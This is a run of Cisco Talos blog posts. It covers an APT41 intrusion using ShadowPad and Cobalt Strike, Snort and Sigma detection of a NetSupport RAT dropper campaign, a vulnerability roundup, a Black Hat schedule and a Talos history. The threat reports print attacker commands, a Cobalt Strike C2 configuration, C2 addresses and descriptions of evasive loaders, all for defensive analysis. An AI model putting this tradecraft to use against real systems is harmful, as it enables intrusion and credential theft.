We observed the threat actor harvesting passwords from the compromised environment. The actor uses Mimikatz to harvest the hashes from the lsass process address space and WebBrowserPassView to get all credentials stored in the web browsers.

From the environment the actor executes several commands including using “net,” “whoami,” “quser,” “ipconfig,” “netstat,” and “dir” commands to obtain information on user accounts, directory structure, and network configurations from the compromised systems. In addition, we also observed query to the registry key to get the current state of software inventory collection on the system with the following command:

C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64

Beside running commands to discover the network, we also observed the ShadowPad sample perform lightweight network scanning to collect the hosts in the network. The malware tries to discover other machines in the same compromised network environment by connecting to the IPs under the same C class sequentially. The connections were all sent to port “53781”, with unknown reason. 

To exfiltrate a large number of files from multiple compromised machines, we observed threat actors using 7zip to compress and encrypt the files into an archive and later using backdoors to send the archive to the control and command server.

Although there is no new backdoor or hacking tools in this attack, we did find some interesting malware loaders. The threat actor leverages two major backdoors into their infection chains in this campaign, including both shadowPad and Cobalt Strike malware. Those two major backdoors were installed via webshell, reverse shell and RDP by the attacker themselves. In addition, two interesting hacking tools were also found, one is to get local privilege escalation and the other is to get web browser credentials. 

**ShadowPad Loader**

During our investigation of this campaign, we encountered two distinct iterations of ShadowPad. While both iterations utilized the same sideloading technique, they each exploited different vulnerable legitimate binaries to initiate the ShadowPad loader.

The initial variant of the ShadowPad loader had been previously discussed in 2020, and some vendors had referred to it as 'ScatterBee'. Its technical structure and the names of its multiple components have remained consistent with earlier reports.

The more recent variant of the ShadowPad loader targeted an outdated and susceptible version of the Microsoft Office IME imecmnt.exe binary, which is over 13 years old. Upon execution, this loader examines the current module for a specific byte sequence at offset 0xE367. Successful verification of the checksum prompts the loader to seek out and decrypt the "Imjp14k.dll.dat" payload for injection into the system's memory.

The imjp14k loader checksum

Furthermore, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. We identified two different loader types, yet both employed the same legitimate binary to launch the malware.

*   G:\\Bee\\Bee6.2(HD)\\Src\\Dll\_3F\_imjp14k\\Release\\Dll\_3F\_imjp14k.pdb
*   G:\\Bee\\Tree\\Src\\Dll\_3F\_imjp14k\\Release\\Dll.pdb

Second type of imjp14k loader checksum

**Cobalt Strike “Anti-AV loader” from Chinese Open Source Project**

There is a Cobalt Strike loader also detected in this incident. With deep analysis for this loader, we found the loader not only packed with UPX but modified the section name to anti-unpack the malware. There are some interesting observations here suggesting that the adversary may be speaking Chinese. The loader was developed by Go programming language and string in the binary indicates a project name “go版本” which means “go version” in mandarin. Based on the project name we found that the code was cloned from a GitHub source that was written in simplified Chinese and the project is to avoid the Cobalt Strike being deleted by antivirus products.

Embedded project name

Upon analyzing the malware and GitHub page we found, we discovered that the attacker might have followed the GitHub steps to generate this loader and deploy the Cobalt Strike beacon to the victim's environment, the screenshots are shown this loader will get an encrypted picture from C2 server and the code logical same as the one on GitHub. 

Source code from github

Malware from the attack

It’s important to highlight that this cobalt strike beacon shellcode used steganography to hide in a picture and executed by this loader. In other words, its download, decryption, and execution routines all happen in runtime in memory. This Cobalt Strike beacon configuration shown below. 

{"C2Server": "http://45.85.76.18:443/yPc1", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n"}

Unmarshal.exe malware decrypts its payload with four stages. The first stage is the executable file which will try to search \[filename\].tbin, and inject a first stage decryption payload, inject\_loader\_1.dll, in an allocated memory block. The first stage decryption payload will decompress second stage payload, inject\_loader\_2.dll, and injection into memory, the second stage payload will also try to search \*.dlls or ddb.dlls file for next stage payload. If it can not find the specific file, it will decrypt the final payload out and inject that payload into another memory block. After deep analysis, we found the final payload is UnmarshalPwn malware which is a POC for CVE-2018-0824 and uses a remote code execution vulnerability to get local privilege escalation. 

With the artifacts we found in this campaign, we pivoted and discovered some samples and infrastructure that were likely used by the same threat actors but in different campaigns. Although we don’t have further visibility into more details about these campaigns at the moment, we hope that by revealing this information, it would empower the community to connect the dots and leverage these insights for additional investigations.

We found 2 other ShadowPad loaders by pivoting the RICH PE header (978ece20137baea2bcb364b160eb9678) of the ShadowPad loader. Sharing the same RICH PE header indicates that these binaries share a similar compilation environment.

*   2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
*   eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28

One of the loaders were observed downloaded from two C2 servers:

*   103.96.131\[.\]84
*   58.64.204\[.\]145

Beside the ShadowPad loader, we found the same Bitdefender loader (386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd) and a payload file on the C2 server. The ShadowPad payload connects to an interesting C2 domain w2.chatgptsfit\[.\]com for communication.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

ClamAV detections are also available for this threat:

Win.Packed.UnmarshalPwn-10019484-0

Win.Packed.CobaltStrike-10019485-0

Win.Loader.UnmarshalPwn-10019486-0

Win.Loader.Shadowpad-10019487-0 

**IOCs **

IOCs for this research can also be found at our GitHub repository here.

APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

In this first Deep Dive with NTDR, we explore how defenders can leverage Snort for the detection of evasive malware threats.

Thursday, August 1, 2024 06:00

_By Chris Morrison._

*   Cisco Talos is actively tracking multiple malware campaigns that utilize NetSupport RAT for persistent infections. 
*   These campaigns evade detection through obfuscation and updates. 
*   Snort can provide a strong defense before this malware reaches endpoints. 
*   In this first Deep Dive with NTDR, we explore how defenders can leverage Snort for the detection of evasive malware threats. 

In November 2023, security vendors identified a new NetSupport RAT campaign that used fake browser updates from compromised and malicious websites to trick users into downloading a stager that downloads and invokes PowerShell commands to install the NetSupport manager agent onto the victim’s machine and establish persistence. 

In January 2024, security researchers published another analysis of the same campaign, although with some differences in the initial JavaScript payload, which demonstrates a threat actor re-focusing on the obfuscation of the initial stager. There are also modifications observed in the agent installation including new paths for the randomized installation. 

So, Cisco Talos followed suit with our own in-depth analysis. We identified multiple obfuscation and evasion techniques being used by the campaign and created appropriate detection to keep users protected. By identifying specific weaknesses in the campaign’s obfuscation techniques and identifying indicators of compromise (IOCs), we can create highly accurate detection of this campaign. Talos is also in a unique position of having primarily open-source detection tools such as Snort and ClamAV. To highlight these capabilities, we will provide a detailed explanation of our detection methodology. 

**Campaign history **

NetSupport Manager has been commercially available for remote device administration since 1989. Like many tools in the IT remote support industry, NetSupport Manager has been weaponized by threat actors who either cannot or do not wish to develop their own RAT. Adversaries first started using NetSuport for malicious purposes in 2017, and at this point, most security vendors widely recognize this software as a RAT. The 2020s' shift to remote work for many office workers marked an increased use of NetSupport RAT in more phishing and drive-by download campaigns, as well as being used alongside other loaders. This campaign is the most notable use of NetSupport RAT in recent years, with hundreds of known stager variants across dozens of domains used in a large-scale malicious advertising campaign. 

**Component summary **

Components in VirusTotal graph. 

1.  Stage 1 is a JavaScript file that is downloaded from one of several malicious advertisements or compromised websites. It’s an obfuscated downloader, keeping a Stage 2 JavaScript and PowerShell payload in memory, which is the actual meat of the dropper. Stage 1 is obfuscated and embedded within otherwise benign JavaScript libraries. 
2.  In Stage 2, a PowerShell script is run via JavaScript. Both are obfuscated, and the PowerShell is embedded in the JavaScript, and the JavaScript is embedded within large comment blocks of random ASCII hex. The PowerShell makes another HTTP GET to retrieve the base64-encoded ZIP. On receipt, the PowerShell extracts the payload into a semi-random path, starts execution, and then establishes basic registry persistence. 
3.  The end payload is a completely portable install of the commercial NetSupport Manager RAT utility. Some of the installs come with additional scripts or slight filename changes to avoid more narrow detection. 

**Stage 1: JavaScript stager **

From 3b587d0c311e8ebc3bb104d564235c41ef8e64592c7419f17f48e0cee9ebc878. 

The screenshot above shows the normalized inner payload for an older version of the JavaScript Stage 1. In this older sample, the actual malicious code is embedded within an otherwise benign JavaScript library. Several libraries are used, including jQuery, moment.js and SheetJS. However, this stage's actual malicious payload is barely obfuscated. The next stage download URL is in plain text. The call to “activeXObject” to create the HTTP connection is in plain text. And similarly, the eval call is in plain text. 

From 01d867d552a06bd778c812810a476441681c4bebabf967e80f8024b3856cb03e 

Here, we have the normalized content of a very recent (first seen 2024.03.09) sample of the stager from the same campaign. Similarly to the older version, the malicious payload is wrapped in an otherwise benign library. Improving over the previous versions, the malicious payload within is further obfuscated with the open-source tool javascript-obfuscator. This results in the removal of the plaintext “activeXObject” and “eval,” however, the output pattern of JavaScript-obfuscator is highly identifiable, as every variable and function name is a random hexadecimal value prefixed by an underscore. 

Deobfuscated 01d867d552a06bd778c812810a476441681c4bebabf967e80f8024b3856cb03e 

The old and new samples shared two major features: All the obfuscation is pre-computed and not done on a per-download basis. This is observable through the fact that so many of the stages can be identified with common entry point functions after having been obfuscated with javascript-obfuscator. Also, the pre-obfuscated stagers are reused by stamping them with a new random download URL. This URL then ends up being in plain text as well so from identifying the highly unique function names from one stager, we can find many more and then automatically extract the download URLs from them statically, which is much faster than throwing them all in analysis sandboxes.  

Fast pattern-only rule for detection. 

**Stage 1 detection **

From a detection standpoint, we can use Snort to leverage a fast\_pattern-only file rule. This simple rule will only detect the given cluster of stagers being downloaded. However, since this is a fast\_pattern-only rule on highly unique text, we can put it in the more general Snort policy configurations since there is little overhead to running this rule. Additionally, the Snort 3 file rule will do all the abstraction from other protocols that can carry files, such as FTP and SMTP, letting us cast our coverage net over a broader attack surface in case this file is being transmitted through more ways than just the known malicious advertisement. 

**Stage 2: JavaScript & PowerShell dropper **

The second stage of the campaign is an in-memory payload downloaded by the on-disk JavaScript. This stage consists of a JavaScript function that then calls PowerShell. 

From 6f3681cd91f7a19c1cf2699e1f9f7b550dfe46841ab5171124e79979fae5424a 

 The JavaScript content is padded on either side by large, repeating, random comment blocks. The actual JavaScript is quite simple, a slightly obfuscated call to ActiveXObject(“WScript.Shell”), which allows the PowerShell command-line to be run. 

Deobfuscated from 6f3681cd91f7a19c1cf2699e1f9f7b550dfe46841ab5171124e79979fae5424a 

The PowerShell invocation is where most of the dropper’s work happens. PowerShell is run with the command line flags “-Ex Bypass” which sets the execution policy to “Bypass”, enabling unsigned execution, “-NoP” which is short for “-NoPolicy” and avoids the current user’s startup script, and “-C” which is short for “-command” and will run the following command line string as a PowerShell script. The commands themselves are a straightforward download of the next stage, which is a base64-encoded ZIP file that contains a portable installation of NetSupport Manager Agent. After downloading the payload, it is base64-decoded, written to disk, and then extracted to the target install folder. A check is run to make sure “client32.exe,” the main executable of the agent, exists in the output directory and then this file is run. Finally, a registry entry is made to establish user-level persistence of the agent on login. 

Interestingly, this stage is not obfuscated with the same techniques as the Stage 1 file. The PowerShell file is only slightly obfuscated through random variable names and string concatenations, and the JavaScript obfuscation uses the same techniques in addition to the mentioned large random comment blocks. Because this obfuscation is so limited, we can rely on static signatures in this case. If future versions of this stager are further obfuscated, using normalized content buffers in Snort such as js\_data can provide a consistent view into the payload. However, this payload has remained largely unchanged besides the payload URLs from November 2023 to March 2024. 

**Stage 2 detection **

For Snort detection, we can use a simple series of content that matches the content of the PowerShell script. The unobfuscated registry key for persistence combined with the PowerShell flags makes a great rule for potential malware dropper detection. We can narrow this even further with the inclusion of the client32.exe filename so that we know we are only alerting on this campaign and similar uses of NetSupport RAT. 

An additional trick would be the use of an HTTP service rule. In Snort 3, the service inspector can identify known services regardless of the port they are on, in contrast to Snort 2 where you will need to define HTTP\_PORTS ahead of time. Regardless of what port the attacker is hosting the HTTP payload on, our rule can detect the malicious content. 

This Snort rule identifies and prevents the current iteration of dropper payloads. A more holistic approach to defense would also include behavioral detection. Since we can observe this dropper’s behavior regardless of any text obfuscation, we will effectively forbid this technique on any protected endpoint and force the threat actor to change tactics. 

Example Sigma detection. 

 The Sigma behavioral rule language can encapsulate this detection quite well. This rule can detect most installs but will fail to identify obfuscations through renames or different registry keys. 

**Obfuscated NetSupport manager download **

Retreading a little bit, the PowerShell invocation downloads a base64-encoded ZIP file of an entire installation of NetSupport Manager agent. For NetSupport Manager and most other legitimate software packages, this is a highly unusual way for the package to be distributed. Most applications are installed via an MSI package or an EXE installer that downloads the full application without obfuscation. The client binaries are not obfuscated by the threat actor since obfuscating an existing compiled binary is more challenging than obfuscating the source code scripts identified in stage 1 and stage 2 files. Because of this, the unique DLLs that encompass most of the NetSupport Manager Client’s actual logic are not renamed. 

It might seem we will have to stream decode the base64 content and unzip it in memory to scan for malicious file contents; we can exploit two specific features of the ZIP in base64 format. The highly unique DLL names will all be close together in the ZIP archive central directory, the structure that holds the information on what files are in the archive. Second, base64 is not a random encoding, and we can pre-compute all three possible base64-encoded strings that represent any one given input. CyberChef has an excellent demonstration of how this works. This method involves the possible two-bit alignment positions within the six-bit encoding size of a given base64 character. Putting all this together means that we can pre-compute all the combinations of the base64-encoded DLL names as high-speed rules that are only looking for static content matches.  

The threat actors using NetSupport RAT in this campaign are typically looking for the fastest way to get a RAT agent into deployment. The threat actors who use NetSupport Manager are not putting a strong amount of effort into obfuscation of droppers, let alone the agents, so this is an effective rule for their non-standard download paths.  

**Additional Snort detections **

Talos has existing Snort coverage for NetSupport Manager Agent’s network activity leveraging SID 44678, which was created back in 2017. We also expanded this coverage in 2020, with the creation of SIDs 53539 - 53544 as the usage by malicious actors increased. For the latest campaign, we increased our coverage through a Snort feature that was not available before. File Rules are a feature only available in Snort 3 that allows the abstraction of file contents from the protocols that carry them, allowing us to write wider-reaching signatures. 

As the NetSupport RAT files are not typically obfuscated by threat actors and it is a legitimate commercial product with many specialized features, there are many opportunities to create detection against the files. For example, in both the EXE and DLLs, the full manufacturer and product information for NetSupport Manager Client is detailed. 

As other legitimate software binaries are unlikely to include the full metadata for NetSupport Manager, this gives us a great signature to work with that lets us cleanly identify the binaries without any heavy reverse engineering needed. Although Snort does not have a modifier for Unicode strings, Unicode text byte strings can be leveraged for detection. Once again, we can use the “file” rule target to throw our detection net over a much larger surface than just HTTP downloads. Other campaigns using NetSupport Manager RAT will be observable from this rule through Snort’s ability to inspect file streams from multiple protocols. 

Although NetSupport RAT continues to be used by malicious campaigns, its widespread use hinders those threat actors who are not willing to dedicate the resources to develop their own tools or more evasive techniques. And since this campaign is still active and updated, we may still observe these techniques being developed and deployed by this threat actor. For now, this gives us an example of when a threat is persistent but not advanced. 

**Indicators of Compromise **

Indicators of Compromise associated with this threat can be found here.

Detecting evolving threats: NetSupport RAT campaign

This year marks the 10th anniversary of Cisco Talos, as the Talos brand was officially launched in August 2014 at Black Hat.

Thursday, August 1, 2024 05:00

With Black Hat just a week away, Cisco Talos is gearing up for another year of heading to Las Vegas to share in some of the latest major cybersecurity announcements, research and news.  

This year marks the 10th anniversary of Cisco Talos, as the Talos brand was officially launched in August 2014 at Black Hat.

We’re celebrating 10 years of pissing off the bad guys by highlighting Talos moments from the archives and recognizing the folks that make Talos, Talos. Be sure to swing by the Cisco booth in the business hall to celebrate 10 years with us!

We know the week of Black Hat is a busy one, so we’ve pulled together our highlights, so you don’t miss anything:  

**Wednesday, Aug. 7  **

**On the show floor:** Talos will have a demo within the Cisco booth where members of Talos will be available all day long. Talos folks will also be presenting in-booth talks every half hour on their latest research and findings. You can also catch a Talos overview in the Splunk booth. 

**Lunch & Learn:** Engage with Cisco Talos Incident Response over "Backdoors & Breaches." Join Joe Marshall and other Talosian game masters from 12:05 to 1:30 p.m. local time in Lagoon KL, Level 2 as they walk attendees through incident response tabletop exercises and learn attack tactics, tools and methods.  

**Sponsored Session:** Nick Biasini will be giving a Cisco Talos threat briefing on identity attacks, zero-days, ransomware and infostealers. Join the session in Mandalay Bay I from 3 - 3:50 p.m. local time.   

**Thursday, Aug. 8 **

**On the show floor:** Talos will have a demo within the Cisco booth where members of Talos will be available all day long. Talos folks will also be presenting in-booth talks every half hour on their latest research and findings. In the Splunk booth, Brad Garnett will cover how Talos IR integrates with Splunk.

Where to find Talos at BlackHat 2024

A binary in Apple macOS could allow an adversary to execute an arbitrary binary that bypasses SIP.

Wednesday, July 31, 2024 12:00

Cisco Talos’ Vulnerability Research team has helped to disclose and patch six new vulnerabilities over the past three weeks, including one in a driver that powers certain NVIDIA graphics cards.  

The majority of the vulnerabilities that Talos disclosed during this period exist in Ankitects Anki, an open-source program that allows users to study information using flashcards. The most serious of these issues has a CVSS score of 9.6 out of 10. 

All the vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. 

**Out-of-bounds read vulnerability in NVIDIA GPU Compiler Driver **

_Discovered by Piotr Bania._ 

A compiler driver in some NVIDIA graphics cards contains an out-of-bounds read vulnerability that could allow an adversary to read an arbitrary memory region. 

An adversary could exploit TALOS-2024-1956 (CVE-2024-0107) by sending a targeted device a specially crafted executable/shader file, leading to an out-of-bounds read. 

This vulnerability could be triggered from guest machines running virtualization environments to perform a guest-to-host escape — as previously demonstrated in other GPU vulnerabilities like TALOS-2018-0533. 

Talos researchers were able to trigger this vulnerability from a Hyper-V guest using the RemoteFX feature, which led to being able to execute the vulnerable code on the Hyper-V host. While Microsoft has deprecated RemoteFX, this feature may still be present in older versions of the Windows operating system. 

**Multiple vulnerabilities in Ankitects Anki flashcard software **

_Discovered by Autumn Bee Skerritt of Cisco Duo Security and Jacob B._ 

The Ankitects Anki flashcard software contains multiple vulnerabilities, one of which could lead to arbitrary code execution. This open-source tool allows users to create and share flashcards to study information.  

An adversary could exploit all these vulnerabilities by sharing a specially crafted, malicious flashcard with a targeted user.  

TALOS-2024-1994 (CVE-2024-32152) could lead to the creation of an arbitrary file along a fixed path. This vulnerability exists because a malicious user could manipulate a blocklist that normally prevents the use of certain malicious commands.  

TALOS-2024-1992 (CVE-2024-29073) also involves manipulating the command blocklist, but in this case, could lead to arbitrary file read. 

An adversary could also exploit TALOS-2024-1995 (CVE-2024-32484), a cross-site scripting vulnerability, in the software to inject JavaScript code into a flashcard and read a normally inaccessible file.  

The most serious among this group of vulnerabilities is TALOS-2024-1993 (CVE-2024-26020), a script injection vulnerability that could lead to arbitrary code execution. This vulnerability has a CVSS score of 9.6 out of 10. In Talos’ testing, researchers could exploit this vulnerability to obtain full command injection on the targeted user’s system.

Out-of-bounds read vulnerability in NVIDIA driver; Open-source flashcard software contains multiple security issues

We look back on 10 years of Talos, in multiple interviews with Talos' leaders.

Wednesday, July 31, 2024 07:55

As part of the celebrations of Cisco Talos turning 10, we’d like to take you back to where it all began: How we formed our mission of protecting our customers and making the internet suck a bit less, an insight into our culture, and how we came to work with some of the most talented human beings on the planet.  

This is the history of Talos, as told through the eyes of some of our senior leaders. 

**The Sourcefire years**

_Editor's note: Sourcefire was a company that specialized in Firepower network security appliances based on Snort, an open-source intrusion detection system. Sourcefire was acquired by Cisco for $2.7 billion in July 2013._

**Matt Watchinski, Vice President of Talos:** What I remember most from the early years of Sourcefire was all of us being crowded into a minuscule meeting room. We spent our days discussing huge, complicated s\*\*t. There was so much mutual respect and understanding for what we set out to achieve. 

**Chris Marshall, Director of Talos Network Detection and Response Team:** We all collectively believed that we could be the best security team on the planet. We were so passionately driven to achieve things together. And we went out of our way to take care of each other to make sure those two other things happened. 

**Watchinksi:** We had a group that could change priorities on a dime, and then actually execute on them — without anybody coming back and saying, “The dumbest decision in the entire world was just made in that tiny room. Now we have to go and do stupid s\*\*t.” Everybody came back from that room and said, “Alright, this is the thing that's going to make Sourcefire the most successful, and so that’s the direction we’re going to march in.” 

**Lurene Grenier, Director of Competitive Analysis:** At Sourcefire our goal was to build the best and most open product we could. At the time, all the rules had to be written by hand, without any guidance. We had no contracts with any companies. The biggest thing on the map at that point was Patch Tuesday bugs, and they were all remote root bugs. Every month, 15 - 20 of those bugs would get dropped. It was my job to grab the patches, patch the systems, reverse engineer the patches, and write an exploit for the bug. And then I would pass that exploit to the team who wrote the \[Snort\] rules. We would write the documentation, package everything up, and send that to QA. 

We significantly changed the security posture and behaviour of Fortune 50 companies on the regular, with about 30 people. We were doing things that the industry said was impossible. And my favorite part was we had executives from those Fortune 50 companies coming out to buy us lunch, begging us to stop telling the public the truth. 

**The acquisition of Sourcefire**

**Marshall:** I came to Sourcefire from the U.S. military. I had no idea what being acquired meant.  

**Watchinski:** We had been in negotiations with Cisco for about six months. I couldn’t tell anyone about that though. Those final negotiations went on until 4 a.m. the morning that the deal closed. We didn’t stop until we had reached a deal that was right for our people. At 4:30 a.m., I sent a text to my directs, telling them that something big was happening, and they should come into the office at 7 a.m.  

**Marshall:** At the time, I ran the response work. And Watchinski didn't tell me if there was a problem. So, my instincts told me something was very wrong. “Who else do I need to call? How bad is the situation?” And he just replied, “I just need you there first thing in the morning.” So, the next morning Watchinski walked in, and me, \[Matt\] Olney \[Director of Threat Intelligence and Interdiction\] and Nigel \[Houghton, former director of Talos Operations\] are standing around anxiously. And then Watchinski said, “Cisco just bought us. We're not working today.”   

**Three teams coming together**

 **Watchinski:** For the first year after the acquisition, Sourcefire continued as the VRT (Vulnerability Research Team). During that time, we met various people across Cisco and tried to figure out what they all did. One of the people I met was Luci \[Lagrimas\]. She’s an incredible person, and we started hatching a plan on how we could be successful together. 

We proposed bringing together a singular set of services, a singular threat research and intelligence team, a singular understanding of our data, and a singular voice of how we talk about security. 

I gave a presentation to what was then three different groups — VRT, Cisco Threat Research, Analysis and Communications (TRAC), and Security Applications (SecApps).  

**Luci Lagrimas, Senior Director of Engineering:** That was a day I’ll always remember. We all gave presentations about who we were and who our teams were. I put three pictures on an “About Me” slide, and one of them was me playing field hockey, wearing a T-shirt that definitely showed off my guns. \[Matt\] Olney leans over to Marshall and says, “Dude, she can kick our ass!”  

**Matt Olney, Director of Talos Threat Intelligence & Interdiction**: This remains true to this day. 

__Luci’s photo from her original slide deck at the first Talos meeting.__

**Marshall:** My first impression of Luci was that slide. That set the tone for these teams coming together, because here’s this badass lady with a field hockey stick causing carnage on the field, and that’s what we were going to bring into our group.  

**The Talos brand is born**

**Lee Jones, Talos distinguished engineer:** My first exposure to Matt \[Watchinski\] was a cultural definition point, because Matt came in and did what he’s great at, which is coalesce things. It was incredible to watch how he started forming the vision of what Talos was going to be. 

**Watchinski:** I believe that to have an effective team, you need three things: a mission that everybody understands, a culture that everybody can work in, and some type of icon that people can rally behind. A colleague of mine would always say, “This is how you build a cult!” And I would reply, “Yeah, kinda...but the good kind of cult.” 

I knew that having three different brands and messages wouldn’t work. We needed the branding to reflect on who we were as a new team coming together. That was a point of unity — giving up what the VRT had built from a brand perspective for over 10 years. And asking the others to do the same. 

**Luci:** Between April and August 2014, the team leaders all threw different ideas into the ring about what we would be called and what sort of brand could represent who we were becoming.  

**Watchinski:** If I remember it right, it was Matt Olney who came up with Talos, protector of the shores. That one resonated most with everyone, because it aligned with our main mission of protecting our customers.  

**Matt Olney** It came about because we wanted something big to represent us. We were now part of a team that was focussed on much more than vulnerabilities. We wanted to have a larger voice as an organization, and a larger role in security consciousness. 

**Luci:** Talos was officially launched at BlackHat in 2014. 

**The team grows**

**Liz Cooperrider, Leader, Talos Project Management Office:** When I started reporting directly to Matt \[Watchinski\] he elevated the Project Management Office (PMO) and the value of what we brought to the organization. 

Since 2019, we’ve been able to grow and become an integral part of Talos, mainly because I was given a lot of independence and autonomy from the team.

**Lee:** After Talos was formed, I was working across the Cisco portfolio, helping them to design products from a security perspective. In 2018, I came back home to Talos. My role was to work with Luci to transition the architectural aspect of Talos, and get it to a trusted product partner level, global in scope and scale, beyond the core competency of the security mission. 

We created a service delivery architecture called “Tomorrowland”. This was a big turning point. It didn’t change our security capabilities themselves, but our ability to project our power went up. 

**Lee:** At a lot of other places, rank and hierarchy matter. Titles matter, and there can be a top-down approach sometimes. But at Talos, there’s a culture of asking questions and pushing back to see, “Do I really believe this and want to incorporate this to my mission?” That is very energizing. I sat back and thought, “This is where I want to be. I’m happy. This is what I was hoping for.” 

**Amy Henderson, Director of Talos Strategic Communications and Operations:** I was a portfolio manager in the Customer Experience organization in Cisco, and at that time (October 2019), one of our key services was Incident response. The IR team worked very closely with Talos, sharing intelligence, understanding what's going on at a customer site when things go down, etc. We eventually came to the decision that Incident Response should become Talos Incident Response, bringing those teams under one umbrella. 

I got to know Watchinski and Olney and really enjoyed working with them. But there was a moment during the transition that the Talos team pulled back. They said they wanted to pause things because it wasn’t being done in the right way. Not being part of Talos at that point, I really appreciated their honesty and integrity. Because when you’re working towards delivering on a priority, sometimes you end up just pushing the ball down the road without necessarily getting the outcome that you want. It’s important to take stock and think about, “Is this actually what we want to achieve?” 

I pinged Olney and said how much I respected their decision. Because it showed the character of the Talos team. They’re not going to rubber stamp everything and say it’s OK when it’s not. 

**Brad Garnett, Director of Talos Incident Response:** I was another Talos transplant. I was running the Incident Response team on the CX side, and as Amy mentioned it made sense to bring us into Talos. Response and intelligence are like peanut butter and jelly, it just goes together.  

We gathered in London in the fall of 2019, and we talked about what IR might look like inside of Talos. Our brand, reputation, integration, intelligence services etc. I still have that agenda from nearly five years ago, and I still remember our first three customers.

That helps me bring perspective — no matter how challenging things get, we’ve hugely grown in scale. Customers need us more than ever. And our mission has grown to not just helping customers on an individual level, but to use that experience to protect all our customers. “The power of the debrief”, as I frequently say to my team. Take what we’re seeing and go help more people. 

**The mission**

**Olney**: When people ask me what I do, I tell them, “I build the expertise that allows me and my team to go places and fix things.” I’m most proud of the work that we do that makes no sense from a corporate or financial perspective, such as the election security work, the work we’ve done to protect Ukraine’s critical infrastructure…the stuff that doesn’t turn a dollar but makes the world a better place. To do all that within a capitalistic entity is pretty remarkable. 

That’s what makes me so proud of this team. We approach security problems as, “How can I positively affect the most amount of people?”  

**Luci:** Whenever I see Talos in the news, I feel really proud to be a part of an organization that isn’t out there just for the money. We’re out there to make the world a better place. 

**Watchinski:** The work we did to help Ukraine, to fill 747s with Cisco kit and fly into a country at war….being able to actually support their operations from either afar or in country, help protect their people, help them turn back on civil infrastructure so that trains run, telephones work, payment processing is functional, the basic needs of society are still met, even though adversaries are actively trying to bring those things offline… I don't think there's a ton of companies that can say they have the capability to do those things. Or even the will to do them. 

**Amy:** And then on top of that, you have Joe Marshall’s Project PowerUp work which helped keep the electrical grid in Ukraine running after disruption from GPS jamming. Joe, on his own terms, found the right people, pulled volunteers together, and we were able to build something to help the grid maintain better time so Ukrainians can have more stable electrical power. 

Extract from a Dutch newspaper reporting on Talos' work on Project PowerUp

 **Marshall:** When we can pull off that kind of thing, it’s because of the trust that we have. More people today trust us than ever before. And I think that trust is well-deserved because of the solid information we can provide.

We bring verified information our customers can act upon, as well as bringing calm to a situation so we can encourage reason. We keep doing that no matter what else happens, and that gives people peace of mind. 

**Amy:** What’s common amongst the folks that we hire is they know that sometimes they’ll need to drop everything and pivot to a rapid response effort. I hope they know that our leadership team fights to give them air cover to a) keep them sane during those times, and b) makes sure that they have what they need. As a leadership team we fight for budgets and time and resources that can help them, because our people have such an innate sense of doing the right thing. We know that the lengths that people go to, and that's one of the many reasons why we will protect them every single day. 

** Our culture**

**Lurene:** In the early days of Sourcefire, there was no situation that came up where we couldn't sit down together and come up with a plan to solve it. We would make it work, and in so doing, we would make a change in the industry. We were given the space to do that. Matt \[Watchinski\] would say, “Go figure this out, come up with some plans, give me three options, and then we're gonna pick one of them and do it.” 

When I came back to Talos two years ago, I was so pleased to see that everybody had protected that culture and passed it on to new leaders in the group. I’m really proud of that. 

It’s our job to make people feel comfortable who might not feel comfortable elsewhere. Developing a space for people who are extremely valuable team members but might have trouble thriving in an extremely generic environment. I am one of those people, so I know I can say that. 

**Olney:** We want Talos be a thing that's worth being yourself with. Our culture is very conscious.  We didn’t do a survey and figure out, “Employees are 2.5% more engaged if you give them free drinks.” They get to define who they are, and who they want to be at Talos. And they get to define what you want your experience at Talos to be like. 

**Liz:** In other organizations, if a team doesn't make their deliverable, there’s zero compassion and no understanding – “Why did that fail?” Within Talos, we can fail and fail fast because there is so much clear transparency. That’s completely a part of the culture. 

**Marshall:** It really is. Until I myself attain perfection, it’s unfair for me to expect perfection from anyone else. 

**Olney:** We ask so much of our people.  We ask them to move fast and make tough decisions. If we were set the tone that every time someone screwed up, it was a job threatening situation, then people would be far more hesitant. They would work inside of smaller boxes. They would think smaller, and they would act less boldly. They would fade into the background more often. That’s the exact opposite of what we want.  

There’s no “Key performance metric” for Joe Marshall to build relationships with the Ukrainians and then come up with a solution that helps them keep the lights on. It’s just what we do…it’s just what we, as Talos, do. 

**Watchinski:** Our culture is the thing I’m most proud of, of all the things Talos has achieved over the past 10 years. 

**Liz:** Talos is also very family first. I remember once I was caring for my father. He had had a hip replacement, and I was to take care of him when he came home from the hospital. I thought I could do it by myself – be his 24-hour nurse and do my job at the same time. I showed up to a sync with Chinski, and he immediately knew something was wrong. He wasn't interested in any of the business side of things. He simply said, “Go. Go take care of your father.”  

